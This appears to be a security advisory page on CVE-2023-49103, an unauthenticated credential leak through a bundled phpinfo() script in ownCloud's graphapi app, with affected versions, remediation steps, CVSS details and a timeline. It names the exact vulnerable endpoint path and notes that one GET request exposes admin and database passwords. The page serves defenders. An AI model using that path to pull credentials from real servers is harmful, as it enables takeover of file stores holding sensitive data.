What is ownCloud graphapi?
ownCloud is a popular open-source file sharing and collaboration platform — a self-hosted alternative to Dropbox or Google Drive — widely deployed by organizations handling sensitive documents, including government agencies, legal firms, healthcare organizations, and enterprises. The ownCloud graphapi app (a third-party library providing Microsoft Graph API compatibility) bundles a PHP diagnostic script (GetPhpInfo.php) from the microsoft/microsoft-graph package. In containerized deployments (Docker), sensitive configuration values such as admin credentials and database passwords are typically passed to the application via environment variables — and PHP's phpinfo() function exposes all environment variables to anyone who can access the script.
Overview
CVE-2023-49103 is a critical information disclosure vulnerability in the ownCloud graphapi app: the GetPhpInfo.php script is publicly accessible without authentication and exposes the output of PHP's phpinfo() function, which in Docker-based ownCloud deployments reveals the OWNCLOUD_ADMIN_PASSWORD, OWNCLOUD_DB_* credentials, mail server passwords, license keys, and all other environment-variable-based secrets. Exploitation requires only a single unauthenticated HTTP GET request. Mass exploitation began within hours of the advisory publication.
Affected Versions
| Product | Affected | Remediation |
|---|---|---|
| ownCloud graphapi 0.2.x | 0.2.0 – 0.2.0 | Delete GetPhpInfo.php |
| ownCloud graphapi 0.3.x | 0.3.0 | Delete GetPhpInfo.php |
| ownCloud (containerized) | All versions with graphapi enabled | Disable phpinfo, rotate all credentials |
Note: The vulnerability is present even if graphapi is disabled — the underlying PHP file remains accessible unless manually deleted.
Technical Details
CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor). The ownCloud graphapi app includes the Microsoft Graph PHP library, which bundles a diagnostic file at vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php. This file calls PHP's built-in phpinfo() function, which outputs a complete PHP environment dump including:
- All PHP environment variables (including
OWNCLOUD_ADMIN_USERNAMEandOWNCLOUD_ADMIN_PASSWORD) - Database connection strings (
OWNCLOUD_DB_HOST,OWNCLOUD_DB_NAME,OWNCLOUD_DB_USER,OWNCLOUD_DB_PASSWORD) - Mail server credentials (
OWNCLOUD_SMTP_PASSWORD) - Object storage credentials (S3 secret keys, etc.)
- PHP configuration, loaded modules, and server information
The file is accessible at /owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php without any authentication. A single GET request retrieves complete credentials for an attacker to authenticate to ownCloud as administrator and access all stored files.
Discovery
The vulnerable file was identified by ownCloud's security team. Following the November 21 advisory, internet scan data (GreyNoise, Shodan) confirmed immediate mass exploitation — attackers scanned all discoverable ownCloud instances for the endpoint within hours of disclosure. The CVSS 10.0 score reflects the trivial exploitation (single unauthenticated GET request) combined with the complete credential exposure enabling further compromise.
Exploitation Context
The vulnerability's ease of exploitation — one unauthenticated HTTP request — made it attractive for both automated scanning campaigns and targeted attacks. Organizations using Docker-based ownCloud deployments in data-sensitive sectors (legal, healthcare, government, financial services) were at particular risk: the leaked admin credentials provide immediate access to all files and user data stored in ownCloud. Following credential theft, attackers can access ownCloud's full file repository, potentially including document management systems with sensitive client data, financial records, or regulated information.
Remediation
- Delete the vulnerable file immediately:
rm /path/to/owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php— this is the primary mitigation even if graphapi is disabled. - Rotate all credentials that may have been exposed: ownCloud admin password, database passwords, mail server passwords, and any other credentials passed as environment variables.
- Disable the
phpinfo()function in PHP configuration (disable_functions = phpinfo) to prevent similar exposures from other bundled diagnostic scripts. - Review ownCloud access logs for GET requests to
/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php— any such request indicates a credential exposure event. - Check ownCloud admin access logs for suspicious login activity using admin credentials after the vulnerability was disclosed (November 21, 2023 onward).
- Update the ownCloud graphapi app to a patched version that removes the GetPhpInfo.php file from the package.
Key Details
| Property | Value |
|---|---|
| CVE ID | CVE-2023-49103 |
| Vendor / Product | ownCloud — ownCloud graphapi |
| NVD Published | 2023-11-21 |
| NVD Last Modified | 2025-10-31 |
| CVSS 3.1 Score | 10 |
| CVSS 3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
| Severity | CRITICAL |
| CWE | CWE-200 find similar ↗ |
| CISA KEV Added | 2023-11-30 |
| CISA KEV Deadline | 2023-12-21 |
| Known Ransomware Use | No |
CVSS 3.1 Breakdown
Required Action
Timeline
| Date | Event |
|---|---|
| 2023-11-21 | ownCloud publishes security advisory disclosing CVE-2023-49103; recommends deleting GetPhpInfo.php file |
| 2023-11-21 | Mass exploitation begins — GreyNoise and Shodan scans immediately observe active probing for the vulnerable endpoint |
| 2023-11-30 | CISA adds to Known Exploited Vulnerabilities catalog |
| 2023-12-21 | CISA BOD 22-01 remediation deadline |
References
| Resource | Type |
|---|---|
| ownCloud Security Advisory — Disclosure of Sensitive Credentials | Vendor Advisory |
| NVD — CVE-2023-49103 | Vulnerability Database |
| CISA KEV Catalog Entry | US Government |